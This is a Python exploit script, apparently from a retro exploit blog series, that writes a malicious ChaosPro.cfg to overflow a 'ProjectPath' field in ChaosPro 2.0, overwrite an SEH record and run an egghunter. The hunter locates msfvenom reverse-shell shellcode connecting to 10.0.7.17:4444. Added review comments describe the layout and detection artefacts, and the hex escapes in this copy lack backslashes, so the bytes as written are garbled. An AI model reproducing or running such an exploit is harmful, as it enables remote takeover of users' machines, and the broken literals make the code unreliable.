#!C:\Python27\python.exe

# Title : ChaosPro 2.0
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

# Overview (review): this script produces a single ChaosPro.cfg whose
# "ProjectPath" value is oversized. Going by the author's comments, the
# intended effect when ChaosPro 2.0 parses that file is an overwrite of a
# structured-exception-handler (SEH) record, with an egghunter locating the
# embedded payload. Artefacts useful for spotting a file built this way, all
# visible in this script: the 8-byte egg marker "T00WT00W" directly after
# "Username ", a "ProjectPath " value of ~2.7 KB that is mostly "A", and —
# per the msfvenom command recorded below — an outbound TCP connection to
# 10.0.7.17:4444 (a private-range lab address in this write-up).

#this needs to be a backwards jump to give us room to call stack jump code
# Two 4-byte short-jump stubs. Both are appended after the egghunter
# (forward stub first, then the backward one) and immediately before the
# SEH bytes; see the appends near the end of the script.
# NOTE(review): in this copy the hex escapes show as bare "xNN" text with no
# backslash, so as written each literal is a 12-character ASCII string and
# the len() calls below count it as such.
jmpback80 = "x40x75x80x75"
jmpforward06 = "x40x75x06x75"

# our egghunter shellcode
# Scans memory for the egg marker. The run "x54x30x30x57" on the third line
# is the ASCII tag "T00W" — the same tag `payload` starts with below.
egghunter = (
"x66x81xcaxffx0fx42x52x31xdbx43"
"x43x53x58xcdx2ex3cx05x5ax74xec"
"xb8x54x30x30x57x89xd7xafx75xe7"
"xafx75xe4xffxe7"
)

# our egg!
# Eight-byte egg marker: the four-byte tag repeated. It is placed in the
# "Username " field (see line_start), i.e. separate from the field that
# overflows, which is why a hunter is needed at all.
payload = "T00WT00W"

#the payload
# Appended directly after the egg so the hunter lands on it. The msfvenom
# command the author recorded asks for a reverse TCP shell to 10.0.7.17:4444
# and the x86/alpha_upper encoder, which is why nearly every byte below is
# in the 0x30–0x39 / 0x41–0x5a (digit / upper-case letter) range; only a
# few bytes at the start of the first line fall outside it.
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b 'x00'
"x89xe1xdbxd7xd9x71xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4cx42x53x30"
"x33x30x43x30x55x30x4bx39x4bx55x46x51x4fx30x32"
"x44x4cx4bx56x30x56x50x4cx4bx46x32x54x4cx4cx4b"
"x50x52x45x44x4cx4bx34x32x37x58x44x4fx4fx47x30"
"x4ax36x46x30x31x4bx4fx4ex4cx47x4cx45x31x43x4c"
"x44x42x56x4cx47x50x4fx31x58x4fx34x4dx45x51x39"
"x57x4bx52x4cx32x56x32x31x47x4cx4bx46x32x32x30"
"x4cx4bx50x4ax47x4cx4cx4bx30x4cx32x31x52x58x4b"
"x53x31x58x53x31x4ex31x36x31x4cx4bx50x59x37x50"
"x45x51x58x53x4cx4bx47x39x35x48x4dx33x37x4ax30"
"x49x4cx4bx57x44x4cx4bx53x31x49x46x46x51x4bx4f"
"x4ex4cx39x51x58x4fx54x4dx45x51x4fx37x36x58x4d"
"x30x33x45x4ax56x43x33x43x4dx4cx38x57x4bx43x4d"
"x56x44x42x55x5ax44x31x48x4cx4bx46x38x31x34x35"
"x51x4ex33x35x36x4cx4bx34x4cx30x4bx4cx4bx56x38"
"x45x4cx55x51x38x53x4cx4bx54x44x4cx4bx45x51x38"
"x50x4dx59x51x54x46x44x56x44x31x4bx31x4bx43x51"
"x31x49x50x5ax30x51x4bx4fx4bx50x51x4fx31x4fx51"
"x4ax4cx4bx32x32x4ax4bx4cx4dx31x4dx42x48x47x43"
"x57x42x53x30x55x50x35x38x53x47x43x43x30x32x31"
"x4fx31x44x33x58x30x4cx33x47x57x56x54x47x4bx4f"
"x49x45x48x38x4ax30x35x51x43x30x35x50x56x49x59"
"x54x36x34x36x30x52x48x56x49x4bx30x52x4bx35x50"
"x4bx4fx59x45x30x50x56x30x56x30x46x30x51x50x36"
"x30x57x30x46x30x55x38x4ax4ax54x4fx39x4fx4bx50"
"x4bx4fx39x45x4dx47x42x4ax35x55x52x48x45x5ax53"
"x30x33x37x34x51x52x48x45x52x53x30x54x51x31x4c"
"x4dx59x5ax46x32x4ax52x30x50x56x46x37x32x48x5a"
"x39x59x35x54x34x43x51x4bx4fx39x45x4dx55x49x50"
"x33x44x44x4cx4bx4fx30x4ex44x48x43x45x5ax4cx35"
"x38x4cx30x48x35x4fx52x36x36x4bx4fx49x45x55x38"
"x52x43x52x4dx52x44x43x30x4bx39x4bx53x56x37x46"
"x37x31x47x50x31x4ax56x33x5ax42x32x51x49x46x36"
"x4bx52x4bx4dx53x56x4fx37x51x54x57x54x37x4cx53"
"x31x43x31x4cx4dx50x44x31x34x34x50x58x46x55x50"
"x30x44x31x44x30x50x30x56x50x56x50x56x30x46x36"
"x36x50x4ex31x46x50x56x50x53x31x46x43x58x52x59"
"x58x4cx47x4fx4bx36x4bx4fx49x45x4dx59x4dx30x50"
"x4ex30x56x57x36x4bx4fx36x50x45x38x44x48x4cx47"
"x35x4dx45x30x4bx4fx49x45x4fx4bx5ax50x48x35x59"
"x32x30x56x42x48x4ex46x4ax35x4fx4dx4dx4dx4bx4f"
"x4ex35x37x4cx54x46x53x4cx54x4ax4dx50x4bx4bx4b"
"x50x52x55x33x35x4fx4bx31x57x54x53x54x32x32x4f"
"x43x5ax33x30x31x43x4bx4fx4ex35x41x41"
)

#line containing our payload
# File body layout: "Username <egg+shellcode> ProjectPath <overflow>".
# presumably "Username" and "ProjectPath" are keys ChaosPro reads from its
# .cfg file — not verifiable from this script alone.
line_start = "Username "
line_start += payload + " "

#line with our overflow
line_start += "ProjectPath "
junk = line_start

# Filler sized so that egghunter + both jump stubs end exactly 2705 bytes
# after "ProjectPath "; the SEH bytes appended last therefore sit at offset
# 2705 of that value. The arithmetic holds whatever len() the three
# literals have, since their lengths are subtracted here and added back by
# the appends below.
junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))

# our egghunter ...
junk += egghunter

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
# Order on disk: forward stub, then backward stub, then the SEH bytes.
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ...
# Only three bytes are written here. The author's comment says the address
# ends in 0x00, which this script does not itself append — presumably it is
# supplied by whatever terminates the value when the file is read; confirm
# against the write-up.
junk += "x50x49x40"

# write the evil file
# Hard-coded output path for the author's lab VM. Text mode ("w") on
# Windows would turn any 0x0a byte into 0x0d 0x0a; none of the literals
# above contain 0x0a, so the content is written unchanged. The backslash
# sequences in the path (\D, \A, \M, \c, \C) are not recognised escapes:
# Python 2 (the interpreter named in the shebang) keeps them literally,
# newer Python 3 releases warn about them. The `with` block closes the
# handle on exit. NOTE(review): in this copy the write() line had lost its
# indentation; it is indented here so the block parses.
with open('C:\Documents and Settings\Administrator\My Documents\Downloads\cpro20\ChaosPro.cfg', 'w') as the_file:
    the_file.write(junk)